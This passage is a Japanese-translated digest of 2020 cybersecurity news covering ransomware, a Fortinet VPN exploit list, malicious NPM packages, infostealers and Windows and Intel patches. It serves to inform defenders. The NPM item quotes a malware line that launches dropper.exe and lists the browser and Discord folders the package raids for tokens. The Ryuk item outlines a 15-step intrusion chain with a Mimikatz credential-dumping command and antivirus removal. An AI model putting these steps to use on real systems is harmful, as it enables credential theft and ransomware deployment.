     この際、被害の拡大を防ぐためにサーバのシャットダウンを集中的に行ったので、一部の小売店舗の営業が中断された」と、Seokはステートメントで謝罪している。
     Seokは、顧客と他の重要なデータは、別のサーバ上で暗号化されているので安全であると発言している。  この攻撃を指揮する身代金要求型マルウェアの作戦によっては、暗号化されていないファイルとデータが盗すまれた可能性がある。
     2019年11月以降、殆どの身代金要求型マルウェアの作戦は、暗号化されていないファイルを盗み、支払いを拒否すれば、それらを公開するという脅しが増加している。
     この二重恐喝戦術は、政府の罰金、データ漏洩の通知、訴訟の可能性、および被害者の評判の低下というリスクに基づく被害者への圧力を目的としている。
     残念なことに、この企業が、データが盗まれたことを明白に開示した場合を除いて、従業員や顧客は、身代金が支払われたか否かを決して知ることはできない。身代金が支払われなかった場合は、盗まれたデータは、犠牲者の面目を潰すために、一般的には身代金要求型マルウェアのデータリークサイトに公開される。
     現時点で、どの身代金要求型マルウェア作戦も、E-Landを攻撃したとする声明を発表していない。


    クレデンシャル・スタッフィング攻撃で30万を超えるSpotifyアカウントがハックされていた
    BleepingComputer : News>Security(2020/11/22)
     ハッカーは、様々なソースから収集したログイン資格情報と個人情報の3億8000万レコードのデータベースを使用してSpotifyアカウントへのアクセスを獲得しようとしている。
     数年間、ユーザはパスワードを変更した後に、彼らのSpotifyアカウントがハックされているのではないか、新しいプレイリスト中に彼らのプロファイルが表示された、あるいは、家族のアカウントが他国からの奇妙な追加があったと苦情を言っていた。

    アカウントがハックされたと訴えているSpotifyユーザ(画像をクリックすると拡大表示されます)

     3億8000万レコードを超えるデータベース(ログイン資格情報を含む)が、Spotifyアカウントをハッキングするために積極的に使用されている方法の詳細に関する新しいレポートは、これらのアカウント・ブリーチ(【訳注】 ブリーチとは攻撃者が脆弱性を通じてサーバーにアクセスすること)に何らかの光を当てるかもしれない。

    Spotifyアカウントをハッキングするためのユーザ情報を含む3億レコード

     アカウントをハッキングするために使用される一般的な攻撃は、クレデンシャル・スタッフィング攻撃と呼ばれる。これは、脅威のアクターが、以前のセキュリティ・ブリーチで漏洩した多大なユーザ名とパスワードの組み合わせのコレクションを使用して、他のオンラインプラットフォームのユーザアカウントへのアクセスを獲得しようとするものである。
     本日、VPNMentorがSpotifyに対する資格情報クレデンシャル・スタッフィング攻撃に使用される3億のユーザ名とパスワードの組み合わせを含むデータベースが、インターネット上に晒されたことに関するレポートをリリースした。
     このデータベース中の各レコードは、以下に示すように、ログイン名、パスワード、この資格情報がSpotifyアカウントのログインに成功するか否かの情報を含んでいる。

    晒されたデータベース中のレコード(画像をクリックすると拡大表示されます)

     3億ものレコードが収集された方法は分かっていないが、おそらく、データ漏洩や一般的に無料で脅威のアクターがリリースした資格情報の多大な「コレクション」を介してではないかと思われる。
     この研究者達は、データベース中にリストされる3億ものレコードで、攻撃者が30万から35万Spotifyアカウントをセキュリティ侵害したと考えている。
     VPNMentorは、2020年7月9日に、データベースの漏洩とアカウントへの脅威についてSpotifyにコンタクトをとっている、そして同日、応答を受け取っている。
     「我々の問い合わせに対する応答で、Spotifyは影響を受ける全てのユーザのパスワードの"ローリング・リセット"(【訳注】 仮想マシンを含む複数のコンピューターで構成されるシステムにおいて、システム全体を停止させず、一部のコンピューターから順次パスワードをリセットする操作(goo辞書より))を開始した。その結果、このデータベースの情報は無効になり役に立たなくなった」と、この研究者達は述べている
     改竄されたアカウントのユーザのために、Spotifyは7月にパスワードのリセットを実行した。
     Spotifyは、ユーザがアカウントを要求している間でさえ、アカウントのセキュリティを大きく増加させるマルチファクタ認証(【訳注】 別名、二段階認証)をサポートしていない。


    ハッカーは49000を超えるFortinet VPNの脆弱性攻撃プログラムを投稿した
    BleepingComputer : News>Security(2020/11/22)
     ハッカーは、約50,000のFortinet VPNデバイスからVPN証明を盗むための脆弱性攻撃プログラムをポストした。
     ターゲットになっている脆弱性のリストには、世界中の重要市中銀行と政府組織に属しているドメインが存在している。

    研究者は数千のターゲットを発見している

     ここで参照されている脆弱性はCVE-2018-13379である。この脆弱性は、多大な数の未パッチのFortinet FortiOS SSL VPNデバイスに影響を与えるパス・トラバーサル(【訳注】 利用者が供給した入力ファイル名のセキュリティ検証/無害化が不十分であるため、ファイルAPIに対して「親ディレクトリへの横断 (traverse)」を示すような文字がすり抜けて渡されてしまうような攻撃手法(Wikipediaより)) フローである。
     この脆弱性を攻撃するプログラムによって、認証されていないリモート攻撃者が、特別に細工されたHTTPリクエストを介してファイルシステムにアクセスすることができる。
     ハッカーによって投稿された脆弱性プログラムは、攻撃者が、sslvpn_websessionファイルにアクセスし、Fortinet VPNからログイン認証情報を盗むことを可能にするものである。盗まれた認証情報は次に、ネットワークを改竄し、身代金要求型マルウェアを配備するために使用することができる。
     2018年のバグは、一年以上前に公開されたが、この研究者は、未だに攻撃者によってターゲットにされることのできる約50,000のターゲットに注目している。
     今週、脅威情報アナリストBank_Securityは、脅威のアクターが、49,577にも及ぶ脆弱性攻撃可能なターゲットのデバイス リストを共有するスレッドをハッカーフォーラムで発見した。

    研究者が発見した脆弱性をホストするスレッド(画像をクリックすると拡大表示されます)

     リスト解析後、この脆弱性のターゲットにされているのが、世界中の政府ドメイン、著名な銀行および金融企業に属しているドメインであることが発見された。

    銀行、金融、政府組織が脆弱

     BleepingComputerによる観測では、50,000ドメインの内、四ダースを超えるドメインが著名な銀行、金融、政府組織に属しているものであった。

    CVE-2018-13379の脆弱性を残したままにしている政府ドメインと大手銀行のWebサイト(画像をクリックすると拡大表示されます)

     Bank SecurityがBleepingComputerに告げたところによると、フォーラムの投稿を確認した後、全ての組織が影響を受けるか否かを同定するためにIPのリストの解析を開始している。
     「どの企業が影響を受けるのかをより正確に発見するために、リスト上の全てのIPでnslookupを実行し、それらの多くに関して、関連するドメインを発見した。」
     次に、このアナリストは、興味深い組織と著名な銀行に関連するドメイン名を同定するために、取得した結果を精査した。
     このアナリストが更にBleepingComputerに告げたところによると、これは、脆弱性攻撃するには取るに足らない古いバグであるが、組織のパッチプロセスは「非常に緩慢」なので、攻撃者が、良く知られているバグへの脆弱性攻撃を継続することを可能にしている。
     「これは、古く、よく知られ、簡単に攻撃できる脆弱性である。攻撃者は既に、長期間それを使用している。残念ながら、企業のパッチプロセスは非常に緩慢であったり、あるいはインターネット上の露出境界が制御されていないため、攻撃者は、比較的簡単に全てのセクターの企業にセキュリティ侵害するために、これらのフローを脆弱性攻撃することができる。」
     先月のBleepingComputerのレポートのように、同じフローが、US government elections support systemsに侵入するために攻撃者によって悪用された。
     それ故、ネットワーク管理者とセキュリティの専門家は、この深刻な脆弱性を即時にパッチするように促されている。


    WordPress Webサイト中のRCEバグは広範なスキャンの対象になっている
    ThreatPost : Blog (2020/11/18)
     研究者によると、数百万の悪意あるスキャンがインターネット上を徘徊し、WordPressのテーマを構築するためのEpsilon Framework中に存在する既知の脆弱性を探している。
     Wordfence Threat Intelligenceチームによると、150万を超えるWordPressサイトに対して、これらの脆弱性をターゲットにする750万を超える探査が、火曜日以来観察されている。
     Epsilonは、複数のサードパーティのWordPressテーマのための基盤を提供するものである。最近、このフレームワークにパッチされた複数のセキュリティバグは、リモートコード実行(RCE)とサイトの乗っ取りを可能にするために繋げることができたと、研究者は発言している。
     コードの再使用により、複数のテーマ(Shapely, NewsMag, Activello, 他の12のテーマ)に、脆弱性のあるバージョンが出回ることになったと、この企業は火曜日のブログで詳細に述べている。
     「Epsilon Frameworkを使用しているWordPress Webサイトのセキュリティフローは、このコンテント マネージメント システムがセキュリティリスクを継承している別の例でもある」と、PerimeterXのセキュリティ エバンジェリスト(【訳注】 新しいテクノロジーや、そのトレンドをユーザーや市場にわかりやすく説明し啓蒙を図り、その普及に向けて努めることが任務の仕事をする人(東洋経済オンラインより))Ameet Naikは、続けて「サードパーティのプラグインとフレームワークを介して導入されたShadow Codeは、Webサイトに対する攻撃領域を甚だしく拡大している。Webサイトの所有者は、サードパーティのプラグインとフレームワークに注意し、セキュリティアップデートの最先端に存在している必要がある」と、E-Mail中で述べている。
     当該の問題は、WordPressの見積では、全体で約15万サイトに影響を与えるfunction-injectionバグである。
     この投稿によれば、「今日までに、我々は18,000を超えるIPアドレスからの攻撃の波を確認している」と、続けて、「我々は偶に、巨大な数のサイトをターゲットにした攻撃を確認するが、それらの殆どは、古い脆弱性をターゲットにしている。攻撃のこの波は、ここ数ヶ月にパッチされただけの脆弱性をターゲットにしている。」
     Wordfenceによると、この攻撃は本質的にプロービング攻撃である。そして、adminajax.phpに対してPOSTリクエストを使用し、明確なログ エントリを残さないようにしている(これらは、Wordfence Live Traffic中で表示されているが)。幸いなことに、いままででは、RCEチェーンは未だ現れていないが、これは、この攻撃が出現しないという意味ではない。
     「さしあたり、これらの攻撃の大多数は、そのサイトが攻撃チェーンを実行するための脆弱性ではなく、インストールされているテーマが脆弱性を持っているか否かを決定するように設計されているプロービング攻撃であることは明らかである」と、続けて、「この攻撃が未だ成熟した状態にはないように見え、多数のIPアドレスが使用されていることから、我々は、この時点でこの攻撃に関する更なる詳細を提供しない」と、研究者は発言している。
     Webサイトのオーナーは、全てのテーマを最新バージョンにアップデートしなさい。
     「WordPressは、最もトラフィックの多いサイトの一部であると共に、電子商取引サイトの大部分でもあり、インターネット上の全てのWebサイトの3分の1を占めている。そこで、WordPressのセキュリティは、組織にとって最大の関心事である」と、 「この最新の攻撃は、Epsilon Frameworkテーマを使用しているWordPressサイトで最近パッチが適用されたインジェクション脆弱性に対するものであり、最新のアップデートのインストールを怠ったサイトを探している。 過去の調査から知られているように、成功した攻撃の60%は、脆弱性に対するものであり、脆弱性攻撃を防ぐためのパッチが既に存在している。 組織は、WordPressサイトのセキュリティをより真剣に受け止める必要がある。そのためには、プラグインとソフトウェアを最新の状態に保ち、パッチを適用することから始めることである」と、CTOでありK2 CyberSecurityの共同創設者であるJayant Shuklaは、E-Mailで述べている。


    Egregor身代金要求型マルウェア攻撃は、脅迫文を犠牲者のプリンタで印刷する
    BleepingComputer : News>Security(2020/11/18)
     Egretor身代金要求型マルウェアは、攻撃後に犠牲者の注意を惹くために、全ての利用可能なプリンタから脅迫文を吐き出させるという目新しいアプローチを使用している。
     身代金要求型マルウェアの背後にいる悪漢共は、多くの企業(従業員を含む)が、株価や評判への新たな影響を恐れて、身代金要求型マルウェアによる攻撃を公開するよりむしろ隠していることを認識している。
     攻撃の社会的認識と犠牲者への支払い圧力をを大きくするために、Egregorオペレーションは、攻撃後、全ての利用可能なネットワーク プリンタとローカル プリンタから脅迫文を繰り返し印刷することで知られている。
     BleepingComputerは、この戦術を認識しているが、Egregorが小売大手のCencosudを攻撃した先週末に初めて動作した。

     脅迫文を印刷しているビデオへのリンク

     拡大された印刷物に見られるように、これはレシート プリンターに印刷されているものであり、コンピューターで作成されたものと同じ脅迫文である。

    レシート プリンターに印刷されているEgregor脅迫文(画像をクリックすると拡大表示されます)

     BleepingComputerは、この身代金要求型マルウェアの実行ファイルが、脅迫文の印刷を実行しているわけではないことを確認している。
     代わりに、この身代金要求型マルウェアの攻撃者が、攻撃の終了時に全ての利用可能なプリンタで脅迫文を印刷するためのスクリプトを悪用していると確信している。
     このスクリプトは、今までの所、発見されていない。


    新しいJupyterマルウェアがブラウザデータを盗み、バックドアを開いている
    BleepingComputer : News>Security(2020/11/13)
     ロシア語を話すハッカー達は、新しいマルウェアを使用し犠牲者から情報を盗んでいる。Jupyterと名付けられたこの脅威は、目立たぬように、速い開発サイクルからの恩恵を受けている。
     Jupyterの目的は、様々なソフトウェアからデータを収集することにあるが、その拡散をサポートする悪意あるコードはまた、感染したシステム上にバックドアを作成するためにも使用されている。

    インストーラは6ヶ月間検出を回避していた

     このマルウェアの亜種は、米国の大学における10月の重大事案対応の取り組みの間に出現した。しかし、犯罪科学データは、5月以降には、以前のバージョンが開発されていたことを示唆していた。
     サイバーセキュリティ企業Morphisecの研究者達は、この攻撃の開発者達が大変積極的であり、一部のコンポーネントは一月に9回以上アップデートが行われていたことを発見した。
     最新のバージョンは11月初めに作成されているが、重要な変更は含まれていない。だが、コードを絶えず変更することは、検出の回避を可能にし、Jupyterが改竄されたシステムから多くのデータを収集することを可能にするものである。
     Jupyterは、.NETベースであり、Chromium, Mozilla Firefox, Google Chromeからデータ(クッキー、信用情報、証明書、オートコンプリート(【訳注】 自動補完機能))を盗むことに重点をおいている。
     Stealerの拡散は、正当なソフトウェアを装うZIPアーカイブ中のインストーラ(Inno Setup executable)をダウンロードすることで始まる。Morphisecによると、これらのインストーラの一部は、この6ヶ月間VirusTotalスキャンニング プラットフォームで全く検出されていなかった。

    Jupyterに関するVirusTotalでの検出結果(画像をクリックすると拡大表示されます)

     このインストーラは、コマンド&コントロールサーバのクライアントとして振る舞う.NETローダのプロセスをメモリ中に挿入するためにプロセスの空洞化(【訳注】 explorer.exe や svchost.exe などの信頼できるアプリケーションを、悪意のあるコードのコンテナとして機能させる目的のためだけにシステムに読み込む手法(Sophosエクスプロイト解説より))テクニックを利用している。
     「次に、このクライアントは次のステージ、即ち、このインメモリ(【訳注】 データベースに格納されたデータやプログラムコードなどを全てメインメモリ上に保持して扱う方式のこと(Weblioより))Jupyter .NETモジュールを実行するPowerShellコマンドをダウンロードする」と、Morphisecは説明している
     このインストーラの後継版で、開発者達はプロセスの空洞化に変えて、PowerShellをメモリ中で実行するようにしている。
     これら戦闘能力の全て(C&Cクライアント、マルウェアのダウンロードと実行、PowerShellスクリプト、コマンド、プロセスの空洞化テクニック)により、拡張されたバックドア機能が有効になる。
     Morphisecの観察から、攻撃チェーンを開始するイニシャル インストーラは、Microsoft Wordドキュメントを装い、以下の名前を使用している。 

    ・ The-Electoral-Process-Worksheet-Key.exe
    ・ Mathematical-Concepts-Precalculus-With-Applications-Solutions.exe
    ・ Excel-Pay-Increase-Spreadsheet-Turotial-Bennett.exe
    ・ Sample-Letter-For-Emergency-Travel-Document

    本物の囮、侵入テストツールキット

     このインストーラは、二つのPowerShellスクリプト(一方で暗号化、もう一方で復号)をバックグラウンドにドロップする間に、迂回路を作成するためにDocx2Rtf、Magix Photo Managerのような正当なツールを実行する。
     イニシャル インストーラの最新バージョンはまた、侵入テストで使用されるPoshC2フレームワークに依存し、ショートカットLINKファイル作成し、それをスタートアップフォルダに配置することで、そのマシン上に永続性を確立する。

    (画像をクリックすると拡大表示されます)

     Morphisecのレポートは、コンポーネントの進化の追跡、それらの内部動作を明らかにするためにJupyter攻撃で使用されるツールとスクリプトに関する技術的詳細を記している。改竄の痕跡も記されている。

    ロシア語のリンク

     この研究者達は、C&C Jupyterサーバの多くがロシアに置かれていると発言している。それらの大多数は現在稼働していない。
     けれども、Morphisecが、Jupyter名がロシア語からの変換と一致するミスタイプであることに気がついたので、ロシア語を話す開発者達へのリンクは、これより強化されている。
     この理論をさらにサポートする証拠が、Jupyterの管理パネルの類似画像検索の後に得られた。そして、これはロシア語フォーラムから得られたものである。

    (画像をクリックすると拡大表示されます)

    このInfostealerの絶え間ない開発は、このマルウェアがノーマークで在り続けるために、新しい要素を追加して変化している。この開発者達は、標的にする情報範囲を拡大している。


    新しいCPUセキュリティバグを修正するWindows 10 Intelマイクロコードがリリースされた
    BleepingComputer : News>Security(2020/11/09)
     Microsoftは、Windows 10 20H2, 2004, 1909, および、それ以前のバージョン用の、新しい一連のIntelマイクロコード アップデートをリリースした。このアップデートは、Intel CPU中に発見された新しいハードウェアの脆弱性を修正するものである。
     Intelが、彼らのCPU中にバグを発見したとき、Intelは、オペレーティングシステムがバグを修正しCPUの挙動をパッチすることを、あるいは、少なくとも軽減することを可能にするマイクロコード アップデートをリリースしている。
     本日、グラーツ工科大学、CISPA Helmholtz Center for Information Security、バーミンガム大学の国際研究者グループは、Platypusと呼ばれるCPUサイドチャンネル(装置の物理的な特性の変化を外部から観測・解析することにより、本来読み取ることができない情報を盗み取る手法(e-Wordより))脆弱性を公開した。
     これらの脆弱性は、ユーザにサポートされているCPUとDRAMメモリの消費電力を監視し管理することを可能にするIntelのRunning Average Power Limit (RAPL)インターフェース中に存在している。
     この研究者達は、RAPLインターフェースを使用して消費電力を監視し、CPUによって実行されている命令を推測し、メモリから重要なデータを盗むことが可能であることを示した。
     デモンストレーションとして、この研究者達は、保護されているIntel SGX Enclave(【訳注】 メモリ上にEnclave(飛び地)と呼ばれる暗号的に厳重に保護された領域を生成することで、センシティブデータを保護しつつプログラムを実行する為のCPUの拡張機能(Qiitaより))からAES-NI(【訳注】 旧来のアルゴリズムを強化し、データ暗号化を高速化する新しい暗号化命令セット(Intelより))キーを盗むためにPlatypus攻撃を使用する方法を示したビデオをリリースしている。

    PLATYPUS - Attacking AES-NI with RAPLのビデオ

    リリースされたWindows 10 Intelマイクロコード アップデート

     本日、Microsoftは、新しいIntelマイクロコード アップデートをリリースした。これはIntel CPU中のPlatypusを含む最新の脆弱性を修正するものである。
     このリリースの一部として修正される追加の脆弱性は以下である。

    CVE-2020-8695 IntelのRunning Average Power Limit (RAPL) Interface
    CVE-2020-8696 Vector Register Sampling active
    CVE-2020-8698 Fast store forward predictor

     このIntelマイクロコードでは、Intelから最新の修正を受け取る四つのCPUファミリーを追加している。

    ・ Avoton
    ・ Sandy Bridge E, EN, EP, EP4S
    ・ Sandy Bridge E, EP
    ・ Valley View / Baytrail

     あなたのデバイスが上記のプロセッサのどれかを使用しているのであれば、関連するIntelマイクロコード アップデートがWindows Updateを介して提供されるだろう。
     これらのアップデートは以下のリンクを使用して、Microsoft Catalogから直接ダウンロードすることもできる。

    ・ KB4589212: Windows 10 2004と20H2、Windows Server 2004と20H2用のIntelマイクロコード アップデート
    ・ KB4589211: Windows 10 1903と1909、Windows Server 1903と1909用のIntelマイクロコード アップデート
    ・ KB4589208: Windows 10 1809、Windows Server 2019用のIntelマイクロコード アップデート
    ・ KB4589206: Windows 10 1803用のIntelマイクロコード アップデート
    ・ KB4589210: Windows 10 1607、Windows Server 2016用のIntelマイクロコード アップデート
    ・ KB4589198: Windows 10 1507用のIntelマイクロコード アップデート

     我々は、ユーザが新しいマイクロコード アップデートをインストールすることを推奨するが、今までのアップデートが最新ではないCPUでパフォーマンス問題を発生させたことや、過去にバグと脆弱性を緩和する方法に起因してシステムをハングさせたことには留意しなければならない。
     Intelマイクロコード アップデートをリリースした後、Windows 10は、パッチを適用するためにコンピュータを再起動するように要求するだろう。
     これを実行する前に、必ず、これらのアップデートをインストールする前に開いていたあらゆるドキュメントを保存しなさい。

    サポートされるCPUか否かをチェックするには

     あなたのコンピュータにどのCPUが実装されているのかをチェックするには、Windows 10デバイスマ ネージャを使用する。
     これを実行するには、Windowsスタートメニューを開き、'Device Manager'(デバイスマネージャ)で検索し、表示されたDevice Manager(デバイスマネージャ)をクリックして開く。次に、以下に示すように、カテゴリのリストをスクロールし'Processors'(プロセッサ)を発見し展開する。

    Windows 10デバイス マネージャ(画像をクリックすると拡大表示されます)

     プロセッサ ファミリ、ステッピング情報(【訳注】 CPUの仕様変更のこと(富士通FMVサポートより))、リビジョン、型番を含むコンピュータのCPUに関してより学習したいのであれば、CPU-Zをダウンロードしなさい。


    CPU-Zを使用してCPUを同定する

     例えば、デバイス マネージャとCPU-Z中に表示される情報から、あなたはインストールされているプロセッサが、Intel i7-8700k Coffee Lakeであることを確認することができる。


    悪意あるNPMプロジェクトはDiscordアカウントとブラウザ情報を盗んでいる
    BleepingComputer : News>Security(2020/11/09)
     強く難読化された悪意に満ちたNPMプロジェクトが、疑うことを知らないユーザからDiscord(【訳注】 Windows・macOS・Linux・Android・iOS・Webブラウザで動作する、ビデオ通話・音声通話・VoIPフリーソフトウェア(Wikipediaより))ユーザ トークンとブラウザ情報を盗むために使用されている。
     NPMは、JavaScriptパッケージマネージャであり、開発者が、100万を超えるパッケージを含むパブリック レジストリから様々なJSモジュールをダウンロードし統合することを可能にするものである。
     NPMは、他の開発者が使用できるように、誰でもが送信することができるオープンシステムである。
     これがオープンシステムであることに起因して、悪意ある攻撃者が、データを盗むための悪意あるモジュールをアップロードし、プログラムをダウンロードし実行する、もしくは、他のプロジェクトに使用された時、悪意ある挙動を実行することが一般的になってきている。

    悪意あるNPMはブラウザデータ、Discordトークンを盗んでいる

     2020年10月25日、NPMはDiscordトークンと、Google Chrome, Brave Browser, Opera, Yandex Browserからブラウザ情報を盗むために設計されていた"fallguys"と呼ばれる悪意あるパッケージを削除した
     本日、オープンソースセキュリティ企業Sonatypeは、ブラウザ情報とDiscordトークンを盗む'discord.dll'と名付けられた別の悪意あるモジュールを発見した。これは、fallguysモジュールの後継と考えられている。
     Sonatypeの研究者Ax Sharmaは、悪意あるNPMプロジェクトは、開発者を欺き、それらを使用させるために正当なプロジェクトとに似た名前を利用することが一般的であると、BleepingComputerに告げている。  「タイポスクワッティングやブランドジャッキングのパッケージは、既存のプランドの価値を利用し、ユーザによる悪意のない間違いを利用しようとするものである」と、Sharmaは述べている。
     これはdiscord.dllと名付けられているが、そのpackage.jsonファイルは、このモジュールが以前GitHubに存在していた'JSTokenGrabber'と呼ばれる別のプロジェクトに基づいていることを示している。

    Discord.dll package.jsonファイル(画像をクリックすると拡大表示されます)

     プロジェクトに使用されると、このモジュールは以下のフォルダ中のLevelDBデータベースからDiscordユーザ トークンとブラウザ情報を盗もうとする。
      ・ %LocalAppData%\Google\Chrome\User Data\Default
      ・ %LocalAppData%\BraveSoftware\Brave-Browser\User Data\Default
      ・ %LocalAppData%\Yandex\YandexBrowser\User Data\Default
      ・ %AppData%\Opera Software\Opera Stable
      ・ %AppData%\discordptb
      ・ %AppData%\discordcanary
      ・ %AppData%\discord
     このパッケージで使用されているファイル名から、情報を盗むために使用される様々なコンポーネントを見ることができる。

    Discord.dllファイルツリー(画像をクリックすると拡大表示されます)

     収集される情報は以下を含む。
      ・ Discord, Discord Public Test Build (PTB), Discord Canaryのユーザトークン
      ・ https://api.ipify.org/?format=json を介しての犠牲者のパブリックIPアドレス
      ・ PCのユーザ名とDiscordのユーザ名
      ・ LevelDBデータベースからのブラウザ情報
     ユーザ情報の収集が終了すると、これらの情報は、DiscordのWebhookを介して攻撃者の制御下にあるDiscordチャンネルに送信される。
     discord.dllパッケージに加えて、Sonatypeは、同じ作者の他の疑わしい3つのパッケージ'discord.app' 'wsbd.js', 'ac-addon'を発見した。
     これらのパッケージが起動すると、'bd.exe', 'dropper.exe', 'lib.exe'と名付けられた実行可能ファイルを自動的に起動する。
     例えば、discord.appは、それが起動した時、dropper.exeプログラムを起動するだろうと、Sonatypeは述べている。
    “require('child_process').exec('dropper.exe');”
     残念ながら、これらのプログラムは発見されていないので、それらが何を実行するのかは未知である。
     discord.dllプロジェクトは、5ヶ月間NPM上で利用可能であり、ダウンロードは100回を数えている。


    Ryuk身代金要求型マルウェアは、どのようにして一企業から3400万ドルを奪ったのか?
    BleepingComputer : News>Security(2020/11/06)
     Ryuk身代金要求型マルウェアで高収益企業を標的にしている或るハッカーグループは、一企業のコンピュータをアンロックする復号キーとの交換で、この企業から3400万ドルを受け取った。
     脅威のアクターは、Ryuk身代金要求型マルウェアを爆発させる前に、改竄されたネットワークを横方向に移動(【訳注】 同一レベル上を移動)し、可能な限りの痕跡を消すことに大変熟達している。

    現金化

    Ryukファイル暗号化マルウェアのネットワークへの進入を容易にするTrickbotボットネットから受け取るIDによるとグループ"One"として参照されるこの脅威のアクターは、ターゲットに到達すると悪辣になる。
     Advanced IntelligenceのVitali Kremezによると、Ryukグループ"one"の最近の犠牲者には、テクノロジ、ヘルスケア、エネルギ、金融サービス、政府部門が含まれている。
     ヘルスケア団体とソーシャルサービス部門は、この脅威のアクターによって攻撃された犠牲者の13%強にすぎない。
     攻撃を再開して以来、Ryuk身代金要求型マルウェアは、犠牲者の大きな痕跡を残してきた。10月に記述されたCheck Pointのレポートでは、この悪漢共は、2020年の第三四半期において毎週平均20社を攻撃している。
     Ryuk身代金要求型マルウェアの最近のニュースでは、Universal Health Services (UHS)、一流のIT企業Sopra SteriaSeyfarth Shaw法律事務所、オフィース家具のトップSteelcase、並びにブルックリンとヴァーモントの病院に属するネットワークが暗号化されたとレポートしている。
     この研究者は、この特定のグループが受け取った平均支払い額が48 Bitcoin(凡そ、$750,000、7750万円)であり、彼らが2018年以来、1億5000万ドル(約155億円)稼いだと、発言している。
     本日のレポートで、Kremezは、このロシア語を話す脅威のアクターは、交渉中は無情であり、寛容を示すことは、まずないと発言している。確認された最大の支払額は、2,200 Bitcoinであり、これは現在、凡そ3400万ドルになる。

    15ステップの攻撃チェーン

     重大事案対応エンゲージメント(Incident Respose Engagement)からの攻撃のフローの解析で、Kremezは、Ryukグループ"one"が、ネットワーク上で利用可能なホスト名を発見し、管理者レベルの証明書を盗み、Ryuk身代金要求型マルウェアを配備するまで15ステップあまりがあると記している。
     彼らは最初に、ネットワーク・セキュリティをテストするレッドチーム(Red team)にも使用される利用可能なソフトウェア(殆どオープンソース)を入手する。
      ・ Mimikatz - メモリから証明書をダンプするためのポストエクスプロイト(【訳注】 攻撃者の侵入後の活動用) ツール
      ・ PowerShell PowerSploit - ポストエクスプロイト用に使用されるPowerShellスクリプトのコレクション
      ・ LaZagne - Mimikatz類似、ローカルコンピュータに保存されているソフトウェアからパスワードを収集するために使用される
      ・ AdFind - アクティブ ディレクトリ検索ツール
      ・ Bloodhound - そのドメイン アクティブ ディレクトリを列挙し可視化するためのポストエクスプロイト ツールであり、デバイス、ユーザログイン、リソース、パーミッションが備えられている
      ・ PsExec - リモートシステム上のプロセスの実行を可能にする
     この攻撃チェーンは、現在のユーザが、Domain Admin(【訳注】 Domain Adminsはドメイン内の全てのコンピュータのAdministrators権限を持っている、言い換えるとドメイン内の全てのコンピュータの管理をする事ができる非常に強力な権限。通常はシステム管理者だけが、持っている権限(ITtripより))グループに属しているか否かのチェック用の"DACheck.ps1"スクリプトを実行するためにCobalt Strike(【訳注】 標的型攻撃を模倣することができる商用製品(JPCERTよ/CCり)) "invoke"コマンドを稼働することによって始まる。  そこから、Mimikatzでパスワードが取得され、ネットワークがマップされ、ホストがFTP, SSH, SMB, RDP, VNCプロトコルに関するポートスキャンによって同定される。
     Kremezは、編集されたCobalt Strikeコマンドを追加した攻撃の完全なステップを説明している。
      1. "Invoke-DACheck"スクリプトでDomain Adminを検査する
      2. Mimikatz "mimikatz's sekurlsa::logonpasswords"でホストパスワードを収集する
      3. トークンを元に戻し、Mimikatzコマンドの出力から管理コメント用のトークンを作成する
      4. "net view"でホストのネットワークを検証する
      5. FTP, SSH, SMB, RDP, VNCプロトコルに関するポートスキャン
      6. 利用可能なホストに関するアクセスをリストする
      7. "net view"とポストスキャンされたホストからバッチスクリプト"adf.bat"を使用してアクティブディレクトリ ファインダー"AdFind"をアップロードする
      8. "WMIC"コマンドを介して、そのホスト上のアンチウィルス名を表示する
      9. このホストをスキャンするために、多目的パスワード リカバリツール"LaZagne"をアップロードする
      10. このパスワード リカバリツールを削除する
      11. ADFindを実行し、出力を保存する
      12. AdFindツール アーティファクトを削除し、出力をダウンロードする
      13. Ryuk身代金要求型マルウェアの全てに対するフルアクセスをネットシェアに付与する
      14. リモート実行ソフトウェア"PSExec"と準備済みのネットワークホストをアップロードし、アンチウィルス製品をアンインストールする
      15. 実行バッチスクリプトと解析されたネットワークホストをアップロードし、改竄された様々なユーザの下でPsExecを介してRyuk身代金要求型マルウェアを実行する
     Trickbotギャングは、少なくとも2020年4月から、スピアフィッシングキャンペーンを通じてBazarLoaderバックドアの拡散を開始している。多く検出されるTrickbotマルウェアとは異なり、このマルウェアは当初、このオペレータにリモートアクセスを提供するCobalt Strikeビーコンを配備するために、金銭的な価値の高い犠牲者用に取り置かれていたようである。
     しかし最近、このマルウェアを使ったフィッシングの試みは、攻撃の時期(休日、イベント)に合わせた疑似餌や、一年中いかなる時でも役に立つテーマ(苦情、給与、サービス、雇用通知)を使用して、より一般的になってきている


    Windows 10 20H2は、LSASSクラッシュで強制再起動を発生させている
    BleepingComputer : News>Security(2020/11/06)
     Microsoftは、Local Security Authority Subsystem Service (LSASS)システムプロセスのクラッシュに起因して、強制再起動を発生させる新しい問題を認識していた。
     LSASSは、Windowsシステムでセキュリティポリシーの実施を担当するシステムプロセスであり、セキュリティログにエントリを追加したり、ユーザログイン、パスワードの変更、アクセストークンの作成を取り扱うためにOSによって使用される。
     LSASSが失敗すると常に、ユーザは即座に、そのマシンで利用可能なアカウントへのアクセスを失い、エラーが自動的に表示され、そのデバイスは強制再起動される。

    クライアント、サーバー両方のプラットフォームに影響を与える

     「Windows 10 20H2にアップグレードした後、ユーザをリストするあらゆるダイアログ(例えば、サインインオプション設定アプリケーションページ、あるいはローカルユーザとグループMMC(Microsoft Management Console)スナップイン中のユーザフォルダへのアクセス)で操作している時に、"Your PC will automatically restart in one minute(PCは1分後に自動的に再起動されます)"のテキストと共にLSASS.exeのエラーを受け取る可能性がある」とMicrosoftは発言している。
     この既知の問題は、アドミニストレータやゲストのようなローカル組み込みアカウントの名前が変更されたデバイスにのみ影響を与えると、Microsoftは追加説明している。
     ユーザはまた、Windowsアプリケーション イベントログにEvent ID 1015が追加され"LSASS.EXE failed with status code C0000374."というエラーを見るだろう。
    Microsoftは、影響を受けるデバイスが、Windows 10バージョン2004やWindows 10バージョン20H2をオファーされたり、インストールされることを妨げるために、新しいアップデート ブロックを適用した。
     Microsoftは、LSASSの既知の問題の解決策が利用可能になり次第、来る数週間以内にアップデート バンドルや更新されたインストレーションメディアを提供するだろうと発言している。
     この問題の修正が提供されるまで、Microsoftは、「この問題が解決されるまで、直にアップデートボタンやMedia Creation Toolを使用して手動アップデートをしないように」ユーザに推奨している

    Windows 10再起動メッセージ(画像をクリックすると拡大表示されます)

    利用可能な解決策

